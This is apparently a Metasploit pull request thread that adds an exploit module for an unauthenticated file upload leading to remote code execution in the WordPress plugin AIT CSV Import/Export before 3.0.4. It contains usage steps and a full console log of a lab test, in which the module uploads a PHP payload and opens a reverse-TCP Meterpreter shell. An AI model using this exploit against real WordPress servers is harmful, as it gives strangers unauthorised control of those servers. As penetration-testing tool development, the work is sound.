Wordpress Plugin: AIT CSV Import / Export RCE

[h00die]

This PR adds an unauthenticated arbitrary file upload (and thus RCE) for wordpress plugin AIT CSV Import / Export < 3.0.4.

The only real info i can find on it is https://vulners.com/wpvulndb/WPVDB-ID:10471

The plugin is a paid one, no free version, but you may be able to find the vuln version (3.0.3) if you google enough. Simply install the plugin, don't even need to enable it, and you're good to go!

Verification

• Start msfconsole
• Install the plugin
• Start msfconsole
• Do: use exploits/multi/http/wp_ait_csv_rce
• Do: set rhost [ip]
• Do: set lhost [ip]
• Do: run
• You should get a shell.

[space-r7]

Code LGTM!

[h00die]

all fixed!

[space-r7]

Tested against v3.0.3 with Wordpress v5.6, and it worked great:

msf6 > use exploit/multi/http/wp_ait_csv_rce 
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_ait_csv_rce) > options

Module options (exploit/multi/http/wp_ait_csv_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path to WordPress installation
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   AIT CSV Import Export <3.0.4


msf6 exploit(multi/http/wp_ait_csv_rce) > set rhost 192.168.37.144
rhost => 192.168.37.144
msf6 exploit(multi/http/wp_ait_csv_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(multi/http/wp_ait_csv_rce) > set verbose true
verbose => true
msf6 exploit(multi/http/wp_ait_csv_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Found version 3.0.3 in the custom file
[+] The target appears to be vulnerable.
[*] Uploading payload: eSetW4.php
[*] Triggering payload
[*] Sending stage (39282 bytes) to 192.168.37.144
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.144:33196) at 2021-01-11 09:37:19 -0600
[+] Deleted eSetW4.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64
Meterpreter : php/linux

[space-r7]

Release Notes

New module exploits/multi/http/wp_ait_csv_rce adds an exploit for various versions of the AIT CSV Import / Export plugin for Wordpress. For plugin versions below v3.0.4, this module exploits an unauthenticated file upload vulnerability to gain code execution against Wordpress installations.